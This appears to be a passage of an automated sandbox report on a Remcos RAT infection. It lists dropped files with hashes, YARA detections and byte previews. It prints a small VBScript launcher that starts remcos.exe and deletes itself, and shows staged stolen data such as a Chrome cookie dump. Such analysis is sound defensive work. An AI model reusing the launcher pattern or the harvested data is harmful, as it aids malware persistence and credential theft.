                                                                                              Preview: 0jb.}...q....8.......,L.,M.^.)....?'@l..Y.J6.A..F...*...W.XX.f[.wV;..J!Q.eet......-.1..l(.mm...~.eJ.K.b&R..../\.x..G..6.....0L../.S$1....1...@....}.P.C?...:.,......R...I..d.BLqg.&..J!...Zt|........1.]8.w..,.......x..D.A..Q..h..,.%.t.|.2.."y..B.C...q..`..8.......,.e.M.|.F;..B?'@l.Y.6.A..F...*...W.X.I.q.!X4.7.`.!...p}..F..u9.d..m9..>.?...$........E...!.....G..6.....}...uo.o............~..R.Yi..._..n,..1..8...I..d.BLqg.&X.31...Z\.g.vg\.P..@]..w..,..z.W.x.CA..V.....h.Y,.%.8.|d...bP..B.C..........SQ^w...,..M.. .).{..v.@l..Y.J6.A..F.....%O.W.X.I.q.!X4.....Z.@.....].u9.d..m9..>.?...$........E...!.....G..6.....}...uo.o............X~..R.Yi...LS.n,..1..8...I..d.BLqg.&..J!...Z ...v.\.P.Q@]8.w..,..z.W.x.CAD.>r.Q..h>.,.%.t.|9..."...B.C.........8.......,.,M.^.)....?'@l..Y.J6.A..F...*...W.X.I.q.!X4`9r`.!...}'...].u9.d..m9..>.?...$........E...!.....G..6.....}...uo.o............X~..R.Yi...LS.n,..1..8...I..d.BLqg.&..J!...Z ...v.\.P.Q@]8.w..,..z.W.x.CAD
                                                                                              C:\Users\user\AppData\Local\Temp\install.vbs
                                                                                              Process:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):418
                                                                                              Entropy (8bit):3.4717335207921964
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:4D8o++ugypjBQMBvFQ4lObRKMJhpE2F0M/0aimi:4Dh+S0FNObrBE2F0Nait
                                                                                              MD5:8F4068DE9C38C97EDB3E3B5467C4F1D4
                                                                                              SHA1:1F6B751A293FAA36A9C48D18DCF1976040D84511
                                                                                              SHA-256:3CCF7A29F9803E439B43337399580DE0CEDB0B5AED1ECDC7107E14FED6ADDD1E
                                                                                              SHA-512:C647221649FF7B067F0C9D6F4B7BAAAA1D9ECE08883DBE887C042D0F35BE9728A966BCC5F9D06292617258E459506918CA17DDCE0F1DD529604E5631770433A8
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.e.m.c.o.s.\.r.e.m.c.o.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                              C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm
                                                                                              Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2
                                                                                              Entropy (8bit):1.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Qn:Qn
                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: ..
                                                                                              C:\Users\user\AppData\Local\Temp\nsaAFFF.tmp\rgsbzeog.dll
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.52147420132688
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                              MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                              SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                              SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                              SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%]..v]..v]..vP.(v}..vP..vR..vP.)v3..vI..wD..v]..v,..v...w\..v...w\..v..6v\..v...w\..vRich]..v........PE..L....`.a...........!......................................................................@.................................d....................................... ...............................@...@............................................text............................... ..`.rdata..Jf.......h..................@..@.data....p... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\nslA5A0.tmp\rgsbzeog.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.52147420132688
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                              MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                              SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                              SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                              SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%]..v]..v]..vP.(v}..vP..vR..vP.)v3..vI..wD..v]..v,..v...w\..v...w\..v..6v\..v...w\..vRich]..v........PE..L....`.a...........!......................................................................@.................................d....................................... ...............................@...@............................................text............................... ..`.rdata..Jf.......h..................@..@.data....p... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\nst9F76.tmp\orwglwkinzb.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.517636244325897
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:7hzc53Ocai7Llp7SW5LuHa6cRbTLGhwTVPXu9pFI5QnJqz5y8E/Ztkh0W0wsWjce:7hQ0cj66JRihwTlV2IHE/V9rqs9uOP
                                                                                              MD5:5E22EEE55114158A4923FE7F8BC9F053
                                                                                              SHA1:AB3E35814486EC8AC7CB41DDADC219EC696C2707
                                                                                              SHA-256:2495D9B36FCD65282D7752BDFF2FD286A27D1F70965F9DF45DB0D818E03CDD02
                                                                                              SHA-512:557B8E36F6482F6A4903B8282A556D5D579A653E0CB94643019997A645ABED1EA39AA09E7DC70EC535F2A2CB0DE14193AF378F6792BF690B862F1E1F6C01DB6B
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t&..H...H...H..G....H..G....H..G....H..~I...H...I...H..`L...H..`H...H..`....H..`J...H.Rich..H.........................PE..L....b.a...........!......................................................................@.........................................................................@...............................`...@............................................text............................... ..`.rdata...f.......h..................@..@.data....o... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\nsuAEE7.tmp\kqkz.dll
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):160256
                                                                                              Entropy (8bit):6.538000111857781
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:6kXjhUexwgZf4JkvBr+t/kBsNrjuO4/l:6WlUMvZfskp9k+Ll
                                                                                              MD5:E490C0FA5D75CB0A0A4A9B14A3BB56F7
                                                                                              SHA1:292116CCA1504B66133959782B4E0CE3F999D42A
                                                                                              SHA-256:F1ADD8B1979665AC28925D672396BEB2F797AF923BE5F2BF1EC4ED25A7AF5131
                                                                                              SHA-512:A515B6E0011A52CAF4C0466127A9716D90EC4B3525F2A4186A12D66AF656AB966B190AC13A9715DA96033EA575366D865DAD08B0FE9920C19D33AEC479BB9622
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x&..H...H...H..K....H..K....H..K....H..rI...H...I...H..lL...H..lH...H..l....H..lJ...H.Rich..H.................PE..L...q`.a...........!......................................................................@.........................................................................@...............................`...@............................................text............................... ..`.rdata...f.......h..................@..@.data....q... ...V..................@....rsrc................X..............@..@.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\nszE2AE.tmp\sozz.dll
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):6.539189721002538
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:Job1THHPuYLlp7SW5LrZ7P6OXK5EmOuFsVFK8zqz3xkzR4kaSqhRusWjcd/wAqUb:JoRzPxJLAEmO/VImmvTqGEsruO
                                                                                              MD5:C5CE5829F17F3964C0B72F2391B69B75
                                                                                              SHA1:66D5892931F145C87BD1A4AA1A073DE585A8E9A8
                                                                                              SHA-256:38EACA6C8ABCC800D05CA5281B1D47B6272B85D05F16A5B0CA2C77E5204E0291
                                                                                              SHA-512:2911BF32947D4631EDCF40415E70B3DFE594B4834075D41CE44CC14530B793D481B859FE6F48712792F92F0CB8762E933A6DCFE7693EE9665D560785713CCF6A
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w.......w.......w.......w...v...w...v...w..s...w..w...w......w..u...w.Rich..w.........PE..L...lK.a...........!......................................................................@.........................................................................`...................................@............................................text.............................. ..`.rdata...g.......h..................@..@.data....o... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              Process:C:\Users\user\Desktop\xxTzyGLZx5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474112
                                                                                              Entropy (8bit):6.580639305620245
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:iegN0jfYLclGb0bVT6e+MT2MffZS/gISYo:ENywLclGIeMT2MXZRISV
                                                                                              MD5:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              SHA1:0E2766C31F8DC69A320B6176D62F6784C9F590DD
                                                                                              SHA-256:F636FA169CBB4D9038EA21B5B1258A3AB92BE41BBAB0020C90C8ECBA105616E2
                                                                                              SHA-512:8565B2EFC06D92878E7BB86AB931237CAAA0BC0D10935F4D8380527A1370461C720ADA5B1815099FF4AC0230F203BD0A0BFE9391367CED380587B4C4C1FB04CE
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}4V..gV..gV..g...gD..g...g...g...gH..g_.gW..g.<.gT..gm..fL..gm..fl..gm..ft..g_.gC..gV..g...g...f...g...gW..g...fW..gRichV..g........PE..L...s..a.................,..........r........@....@.................................................................................. ...K...................p..49.. }..8....................}......X}..@............@...............................text....+.......,.................. ..`.rdata...p...@...r...0..............@..@.data....>..........................@....tls................................@....gfids..0...........................@..@.rsrc....K... ...L..................@..@.reloc..49...p...:..................@..B................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\tmpG77.tmp (copy)
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):586861
                                                                                              Entropy (8bit):7.360391735779929
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:Khzfld/fqWhWxlXWx/0tTJwbxlKzMbDtz6yrkvtVm:SPXqWtGtTOl0zM/6vtVm
                                                                                              MD5:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              SHA1:385599DCC3260AC9BB782DA9AB0C69A7BB541645
                                                                                              SHA-256:A542D2953BB5F7516342E100BB01447371CDF7BAF2FD300D61B52D4D2E323DC1
                                                                                              SHA-512:39B30A1AEA89DB0E30A208157B4E606463CAEC72E66D231EDBEC22044E8C66E09674C66D36E2AF363352735D0387C050BC73AEBA47D254ACFE0AB2D9C7965203
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...[...........................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc....[...p...\...x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Local\Temp\wfkc2ng2j1zi47wu
                                                                                              Process:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):292351
                                                                                              Entropy (8bit):7.962109927544079
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:sqgPWQ5LygxHB7pCGfvgAxjCaJ3bOB7ue86z3hTL:sqgR5LyyhNfoAAm3CBSe8wL
                                                                                              MD5:C74CA0B179975FE89176F547FB451295
                                                                                              SHA1:58AB2433A0D92963878565A1E618A6743F168B1D
                                                                                              SHA-256:34B93EA5F2702E8115430860C6363F8FBD96D9DB9C408FDE8A3E9CC60BCC63FE
                                                                                              SHA-512:AC19409FEEA8AA831516E767403A64ACDC0CB339A178EE97CF1027E3DED15D5B9E639D310204E5FEF67E40B15101C5E39E89CC5EE90D8392F84F59E87F229E35
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: .t.{.+X.>.r.Qo....l@gx.....]Q..'....Ia.3.V[...T..x..q9......K...T.$.).[...P......_.qa..N..f....Q......h.........C..e.7K#..n6...8.+.t..B)...d.m.M....e ..|.<^%.&....^..v.....1BF.{T..2.%..1.....j_.x.w./i.L&O.........6....g........P... .cn\...s.r...}..{t+X..Gr.....c.x.gx.....]3.:4E....a.3q][...Tw.x...9.....G...A...;.......(.........6g.s...=..z.=....."I%..........n....4...fm/..&.c.....^....N.{K.i.\.[t.v%.g. #....8L..9.......J.G.BJ2....T..#.e..]uH..}PJ.wJ....?...B....*|.PV.G1^..s.r.......X+X.l.r.....yl@gj.....]Q..'...%Ia.s~...a.T..x..-9.....G....v........[..(..=.;f...6a6........=.."..."I......1a.|_d...e..C4....Y/..l.C...._X.ed...N..K.#.Px&c.v%.o` #r#...wL2........J.G.BJ.....T..#.e...7HF.}PJ.wJ.......'NB....*|.PV.G1^..s.r...}..{t+X.V.r.....l@gx.....]Q..'....Ia.3.V[...T..x..q9.....G....v........[..(....I....6g&...L=..z.=......"I......a.....n6...4...fm/..l.C.c.._X.ed...N.{K.i.\.[t.v%.g. #......L2.9.......J.G.BJ2....T..#.e...7HF.}PJ.wJ.......'NB.
                                                                                              C:\Users\user\AppData\Roaming\Fhg.xgx.tmp
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.792852251086831
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\BURPLQ1DAW.zip
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data, at least v2.0 to extract
                                                                                              Category:dropped
                                                                                              Size (bytes):335116
                                                                                              Entropy (8bit):7.99865634158973
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:lF/AL7I6x342wEvy2G+HX6I96ebo91jyxYcGW0d4eNfHHLsdXsb2py1vSLa3ob:lFI1BqIETjyxr+PHqHpWvCFb
                                                                                              MD5:9DEE51A7DF7E726BA206C00F23D66971
                                                                                              SHA1:5B03D00901AFC9B0576694D7F6EB87AEC9C3559B
                                                                                              SHA-256:1D4BA7BF1A88C1CBAF7341778FD54FA552E0E3004338F985E386F868659CF5A2
                                                                                              SHA-512:9FB8116D5815BAE45DAF5955E85FC3AC45B5C13043E2C93D301A0EDD988451E816A3508C5F21365EF4B6E9B2835ECDDF83B6A73D95A6501EAC9EECA0468C1F7C
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK........fd.@.k.W....{%......sqlite3.dll..}|T.8..3s.L..3.....5j...2$.....q..h|....@..Lz....*jk.V{...[...$.L.TC.B...S8.....4.[k.3.I.......y>.-.}...z.k...l3g.8N...................k$.-.o7......G...U.......A.SO...?.R.|&e...g....pA..~..3w....j.....h....y.k...9....1.7..f.r\f....R.d.....m.ba..o..?.o.....<....R.r..ga?)q...h.7#...rU...o..8.u....=...bwJ.H..~_..!.k....;.~Bz..#9}......\z....?.-...w.w..|n..O.Y..7p.lq..s....^..#.+n..^..]........\rV.....Ww.g.#.fs....s\'...._...#...[..s?z.......~...u.tc.q-.2.....u....M.i....*{x>[.]....y8.u....N.{.,...?..m.{x...a...8h........~.>..K........C....,p...8.......|.>/.S...:xr<N.E.....w7..X.....|........G.^.t.....jQU.4.. @H...uc...N..j.Y.Z..S._.2.c0.+...B.?.Xe.}y...P..P.4*[h......4...Z.T.LOU....).....p.be%.C....P.z;..\Z.....V.....c3...;.@..T........<..c+..T.. ..j.f.)......\8..S.{.~.I/.6.....F..8g]..b....j,.2V...^..R..@N..._....[.....<t...U5KN..-Ej..."...Xl$.`.....Z :..a.P.....u....[:.^-..v...m2
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\CookiesChrome.txt
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):890
                                                                                              Entropy (8bit):4.902160711477108
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:gMepjLc5DnCuV6T/8ox2U1KKOa33HQ4xqp:gtjLc5NcQRU1/x3A4Y
                                                                                              MD5:563C215C004E2A6FE00FFB1503A0F2F8
                                                                                              SHA1:D8AAB02B6643913D92244FF9EABE398D40C3E9D1
                                                                                              SHA-256:6820FF3BEC4D778F6F38EAA2E04EEB0056239A25B2BB0802C66683358909D3C7
                                                                                              SHA-512:FEFBC07971250C021E3652C488C4E77B5F6AD84419903DD7C715D5C16451F4B583795345A20001C97491B4B53A5ECC77364A78CA7C2C5D071F787BC310073A96
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: [{.. "Host raw": "https://.google.com",.. "Name raw": "NID",.. "Path raw": "/",.. "Content raw": "7631303F5C3A3F555E563F3F143F343F3F20653F4B657A3F3F3F3F4410073F713F193F52783F3F593C3F533F03123F3F073F2A3F2D3F183F523F3F473F633F4A3F0C3F3F3F3F3F1E3F3F5A3F34443F603F6D3F15703F3F0868053F3F183F07763F423F703F1E273F18117D7E4B3F3F360A3F3F053F376A3F3F3F3F703F3F64563F3F62283F381A7160507A3F3F3F3F5D3F423F3F3F4A3F3F20483F3F253F3F42595B3F46323F323F0C4D073F4E3F3F543F4A3F3F623F3F5B683F3F4A213F1B3F56713F26",.. "Expires": "12:00:00 AM",.. "Expires raw": "13261735795164740",.. "Send for": "Any type of connection",.. "Send for raw": "false",.. "HTTP only raw": "false",.. "SameSite raw": "no_restriction",.. "This domain only": "Valid for subdomains",.. "This domain only raw": "false",.. "Store raw": "firefox-default",.. "First Party Domain": ""..},..{....}]....
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data (empty)
                                                                                              Category:dropped
                                                                                              Size (bytes):24
                                                                                              Entropy (8bit):1.4575187496394222
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:pjt/lC:NtU
                                                                                              MD5:98A833E15D18697E8E56CDAFB0642647
                                                                                              SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                                                              SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                                                              SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK......................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files.zip~RF421d9e0.TMP (copy)
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:Zip archive data (empty)
                                                                                              Category:dropped
                                                                                              Size (bytes):24
                                                                                              Entropy (8bit):1.4575187496394222
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:pjt/lC:NtU
                                                                                              MD5:98A833E15D18697E8E56CDAFB0642647
                                                                                              SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                                                              SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                                                              SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: PK......................
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\LSBIHQFDVT.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.698193102830694
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                              MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                              SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                              SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                              SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM
                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Files\SFPUSAFIOL.pdf
                                                                                              Process:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1026
                                                                                              Entropy (8bit):4.696913287597031
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                              MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                              SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                              SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                              SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                              Malicious:false
                                                                                              Reputation:unknown
